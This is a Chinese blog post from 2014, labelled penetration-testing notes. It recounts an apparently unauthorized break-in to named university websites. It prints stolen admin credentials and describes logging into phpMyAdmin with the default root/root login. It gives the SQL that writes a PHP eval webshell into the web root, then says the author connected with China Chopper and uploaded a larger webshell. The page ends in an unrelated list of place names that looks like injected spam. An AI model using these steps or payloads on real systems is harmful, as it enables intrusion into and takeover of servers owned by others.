qileilove

          blog已經(jīng)轉(zhuǎn)移至github,大家請?jiān)L問 http://qaseven.github.io/

          滲透測試筆記

          今天朋友在入侵織夢的網(wǎng)站系統(tǒng),通過最新的Exp獲得了織夢后臺的賬號和密碼
            賬號:admin
            密碼:abc123456
            但是,找來找去找不到后臺,就讓我提權(quán)試試。
            我看了下:http://pxc.ncist.edu.cn/dede/
            后臺被刪除了!怎么辦??
            google hack也沒找到后臺
            后來,我試了試這個網(wǎng)站:http://zsjy.ncist.edu.cn/phpmyadmin
            輸入默認(rèn)MySql賬號與密碼:
            賬號:root
            密碼:root
            居然進(jìn)去了:
            接下來就是phpmyadmin提權(quán)了:
            我的思路是:
            1.先爆出php服務(wù)器www的路徑
            2.然后通過將php一句話插入數(shù)據(jù)庫再導(dǎo)出到www路徑
            通過google hack爆到路徑:D\www\
            呵呵,接下來就執(zhí)行sql語句:
          CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );
          INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');
          SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';
            這段sql意思是:
            1.在mysql數(shù)據(jù)庫中建一張表叫xss,在xss表中生成一個field(字段)叫xss1
            2.將php一句話木馬插入數(shù)據(jù)庫中的xss1字段處
            3.將數(shù)據(jù)庫中xss1字段的內(nèi)容導(dǎo)出到d:\www\x.php文件中
            這下,通過chopper連接x.php小馬得到shell


           接下來,上傳一個php大馬spider.php
            通過FF連接spider.php:
            成功獲得webshell!!!

          posted on 2014-04-24 10:21 順其自然EVO 閱讀(509) 評論(0)  編輯  收藏 所屬分類: 測試學(xué)習(xí)專欄安全性測試

          <2014年4月>
          303112345
          6789101112
          13141516171819
          20212223242526
          27282930123
          45678910

          導(dǎo)航

          統(tǒng)計(jì)

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 普陀区| 隆化县| 郁南县| 扶余县| 十堰市| 成安县| 共和县| 周口市| 景洪市| 依兰县| 望江县| 蒙阴县| 平邑县| 惠东县| 孟州市| 兰溪市| 锡林浩特市| 江源县| 利辛县| 天镇县| 瑞金市| 孝义市| 朝阳区| 罗甸县| 南华县| 鱼台县| 溧阳市| 石河子市| 巫山县| 义马市| 科尔| 庆元县| 曲靖市| 邯郸市| 广州市| 四子王旗| 涟源市| 汉源县| 张家口市| 汪清县| 桂东县|